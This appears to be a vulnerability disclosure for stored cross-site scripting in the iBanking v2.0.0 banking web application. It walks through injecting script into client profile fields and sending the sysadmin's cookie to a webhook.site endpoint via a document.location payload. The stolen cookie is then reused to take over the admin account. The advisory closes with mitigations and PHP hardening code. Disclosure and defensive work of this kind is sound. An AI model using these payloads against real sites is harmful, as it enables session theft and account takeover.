Description: Stored XSS leading to sysadmin session fixation

Version affected: iBanking V2.0.0

Version fixed: N/A

System: https://github.com/MartMbithi/iBanking

Researcher: Simon Njuguna

Proof of concept

Description: A stored cross-site scripting (XSS) vulnerability in the Client Profile Update section of Mart Developers iBanking v2.0.0 allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into the Name parameter (the phone number and address fields are affected in the same way).

1.1 Steps to reproduce the vulnerability

Access the iBanking system

Log in as sysadmin and create a new client

Add the client details

Click add client to save the details

As the newly created client, navigate to the Client portal and log in as the new user.

Navigate to the Account section

In the name, phone number or address field, insert JavaScript that outputs the cookie of the currently logged-in user:

<script>alert('document.cookie')</script>

For demonstration purposes, we will use the address field.

Click Update Account.

The page will display John Doe's cookie.

Head over to the admin portal and log in as sysadmin.

Navigate to Clients > Manage clients.

Once the sysadmin clicks the Manage clients link, the sysadmin's cookie is displayed, because the stored payload executes in the admin's browser.

Now that we are able to retrieve the cookie, we can use a webhook to send the cookie to a remote endpoint. Head over to the John Doe account and edit the address field:

<script>document.location='[webhook_url]/?'+document.cookie</script>

Sample script:

<script>document.location='https://webhook.site/3b6ac3f3-e93a-0913-q57i-17b8acbd3f2a/?'+document.cookie</script>

Click Update.

The webhook will receive the admin cookie every time the administrator navigates to the Manage clients section.

Head back to the sysadmin account and click Clients > Manage clients.

The session cookie will be received by the webhook.

Session Fixation

With the admin cookie in hand, we can, as the client user, replace our own session cookie with it and be logged in as the sysadmin.

Visit the URL http://iBanking_IP/core/admin/pages_dashboard.php from the client's browser to access the admin dashboard.

Since the current client cookie is not valid for the sysadmin session, the browser will redirect you to http://iBanking_IP/admin/pages_index.php and prompt you to log in.

Copy the sysadmin cookie received via the webhook and open the developer tools.

On Firefox:

Developer Tools > Storage > Cookies, and identify the client login cookie.

Double-click the Value field, paste the sysadmin cookie and press Enter.

On Chrome:

Open Developer Tools > Application > Storage > Cookies and replace the client cookie with the sysadmin cookie.

Burp Suite and ZAP Proxy:

The same can be achieved by intercepting the request with Burp Suite or ZAP Proxy and amending the cookie value.

Now, from the client browser, access the sysadmin dashboard: http://iBanking_IP/admin/pages_dashboard.php

You have now successfully taken over the sysadmin account.

Some possible vulnerability mitigation measures

  • Implement server-side input validation and sanitization, rejecting values that do not fit the field (a name or phone number never needs angle brackets).
  • Encode user-supplied data for the HTML context it is rendered in before displaying it, so stored payloads are shown as text rather than executed.
  • Set a Content Security Policy header in the web server to block inline scripts and limit the sources scripts may be loaded from.
  • Set session cookies with the HttpOnly and Secure flags, so document.cookie cannot read them and they are only sent over HTTPS; this directly defeats the cookie theft shown above.
  • Implement anti-CSRF tokens in forms to prevent unauthorized requests.
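The measures above put together as an added PHP hardening example; this is not iBanking's own code, and the profile-page layout, the phone-number rule and the exact CSP values are assumptions:

```php
<?php
// Added hardening example for a PHP application such as iBanking; this is
// not the project's own code. It assumes a profile page that echoes the
// stored client name, phone and address fields into an HTML table.

// 1. Session cookie flags (must run before session_start()): HttpOnly keeps
//    document.cookie from reading the session id, Secure limits the cookie
//    to HTTPS, SameSite limits cross-site request forgery.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);
session_start();
// After credentials are verified at login, also call
// session_regenerate_id(true) so a pre-login session id cannot be reused.

// 2. Content Security Policy: inline <script> blocks are not executed, so a
//    stored payload stays harmless even where output encoding is missed.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");

// 3. Output encoding for HTML text and attribute contexts.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 4. Server-side validation on the way in: reject input that does not fit
//    the field instead of relying on encoding alone (hypothetical rule).
function validate_phone(string $phone): bool
{
    return preg_match('/^\+?[0-9 ]{7,15}$/', $phone) === 1;
}

// Constructed sample record holding the advisory's payload in 'address'.
$client = [
    'name'    => 'John Doe',
    'address' => "<script>alert('document.cookie')</script>",
];

// Vulnerable pattern (what the advisory describes): echoing raw stored data.
// echo "<td>{$client['address']}</td>";

// Hardened: the stored payload is rendered as inert text, not executed.
echo '<td>' . e($client['name']) . '</td>';
echo '<td>' . e($client['address']) . '</td>';
```

With the HttpOnly flag set, the webhook payload from the proof of concept would still run until the encoding and CSP fixes are in place, but it would no longer be able to read the session cookie.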